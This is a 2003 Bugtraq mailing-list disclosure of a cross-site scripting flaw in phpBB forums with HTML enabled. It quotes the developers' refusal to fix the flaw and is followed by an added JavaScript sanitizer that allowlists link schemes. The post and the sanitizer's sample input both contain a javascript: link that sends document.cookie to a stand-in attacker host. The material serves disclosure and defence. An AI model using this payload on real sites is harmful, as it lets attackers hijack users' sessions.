XSS vulnerability in phpBB

From: Marvin Massih (GroennDemon_at_web.de)
Date: 08/18/03

    Date: Mon, 18 Aug 2003 21:56:59 +0200
    To: bugtraq <bugtraq@securityfocus.com>

    Hi,

    I have found a dangerous vulnerability in phpBB.
    I've verified that versions 2.0.5 and 2.0.4 (AFAIK the two latest versions)
    are affected, but probably more versions are vulnerable.

    If HTML is enabled for postings, a user can post a link like this:

    <a
    href="javascript:document.location.replace('http://www.evil-server.com/cgi-bin/evil.cgi?stolen_cookie='
    + document.cookie);">Click me, I'm innocent</a>

    If a user clicks it, his cookie will be sent to the attacker, which he
    can use to log on as the user if autologon is enabled.

    I reported this vulnerability to the phpBB developers (which wasn't
    that easy as they had trouble with their mail server), that was about
    three weeks ago.

    However, the developers don't want to fix it:

    "The main developer decided that this isn't a security issue, because it
    is not able to re-parse every single allowed html tag. The bbcode tag
    [url] is absolutely suitable for displaying urls, therefore allowing the
    a html tag is a risk the Administrator has to take."

    Again, I asked them to fix it, I couldn't believe they were serious.
    This time I told them they should do something soon - or at least tell
    me that they're working on it - , otherwise I'd finally publish the
    information.

    The response was:

    "Actually, after second thoughts I don't see this issue as a security
    flaw on our side, enabling unchecked HTML is taking the same risk as
    allowing users to use <script> tags. I'm in favor of putting a notice
    warning the admin of the potential security risk when enabling given
    tags but trying to fix that on our side will cause more problems than it
    will solve."

    So, I'm publishing this information now, hoping that this will help.

    AFAIK a new version, 2.0.6, is out now, but as they refused to fix this
    issue I don't know if there is any difference.

    Regards,

    Marvin
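
The report above describes a link whose href carries a javascript: URL that reads document.cookie. The following is an added example, not code from the original post or from phpBB, showing the defensive check that the developers' reply says is missing when HTML is enabled: the href of every user-posted <a> tag is checked against an allowlist of URL schemes, after decoding character references and stripping control characters the way a browser would, and unsafe hrefs are replaced before the post is stored or rendered. The function names, the allowlist and the sample post are my own assumptions; the sample post is constructed from the vector in the report.

```javascript
// Added example (not from the original post or from phpBB): scheme
// allowlisting for the href attribute of user-posted <a> tags.

// Character references a browser decodes inside an attribute value before it
// resolves the URL. The check must decode them too, otherwise a reference
// such as "&#106;avascript:" passes a plain string comparison.
const NAMED_ENTITIES = { amp: "&", lt: "<", gt: ">", quot: '"', apos: "'" };

function decodeAttributeValue(value) {
  return value.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);?/gi, (match, body) => {
    if (body[0] === "#") {
      const code = body[1].toLowerCase() === "x"
        ? parseInt(body.slice(2), 16)
        : parseInt(body.slice(1), 10);
      if (Number.isNaN(code) || code > 0x10ffff) return match;
      return String.fromCodePoint(code);
    }
    const named = NAMED_ENTITIES[body.toLowerCase()];
    return named === undefined ? match : named;
  });
}

// Schemes a user-supplied link may use (assumed allowlist). Everything else,
// including javascript:, vbscript: and data:, is rejected by construction.
const ALLOWED_SCHEMES = new Set(["http", "https", "ftp", "mailto"]);

function isSafeHref(rawHref) {
  // Decode references, then drop ASCII control characters and whitespace,
  // which browsers ignore when parsing the scheme ("java<TAB>script:").
  const href = decodeAttributeValue(rawHref).replace(/[\u0000-\u0020]/g, "");
  // A reference we could not decode may still hide a scheme; be conservative.
  if (/&[a-z0-9#]+;/i.test(href)) return false;
  const schemeMatch = /^([a-z][a-z0-9+.-]*):/i.exec(href);
  if (schemeMatch === null) {
    // No scheme: a relative link such as "viewtopic.php?t=1" or "#anchor".
    return true;
  }
  return ALLOWED_SCHEMES.has(schemeMatch[1].toLowerCase());
}

// Rewrite every <a ... href=...> in a post so that an unsafe href becomes "#".
// Regex-based tag handling is adequate for this demonstration only; a real
// filter should operate on a parsed DOM rather than on raw markup.
function neutralizeUnsafeLinks(html) {
  return html.replace(
    /(<a\b[^>]*?\bhref\s*=\s*)("([^"]*)"|'([^']*)'|([^\s>]+))/gi,
    (match, prefix, _quoted, dq, sq, bare) => {
      const href = dq !== undefined ? dq : sq !== undefined ? sq : bare;
      return isSafeHref(href) ? match : `${prefix}"#"`;
    }
  );
}

// Constructed sample post using the vector from the report above.
const SAMPLE_POST =
  "Look at this: <a\n" +
  "href=\"javascript:document.location.replace('http://www.evil-server.com/cgi-bin/evil.cgi?stolen_cookie='" +
  " + document.cookie);\">Click me, I'm innocent</a>" +
  ' and a normal link <a href="http://www.phpbb.com/?a=1&amp;b=2">phpBB</a>.';

function sanitizedSamplePost() {
  return neutralizeUnsafeLinks(SAMPLE_POST);
}
```

Rejecting everything outside a short allowlist is what makes this robust: a blocklist that looks for the literal string "javascript:" is defeated by case changes, embedded tabs or numeric character references, all of which the normalisation above folds away before the comparison. Independently of the post filter, marking the session and autologin cookies HttpOnly keeps document.cookie from exposing them to a script that does run, which limits the impact the report describes.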

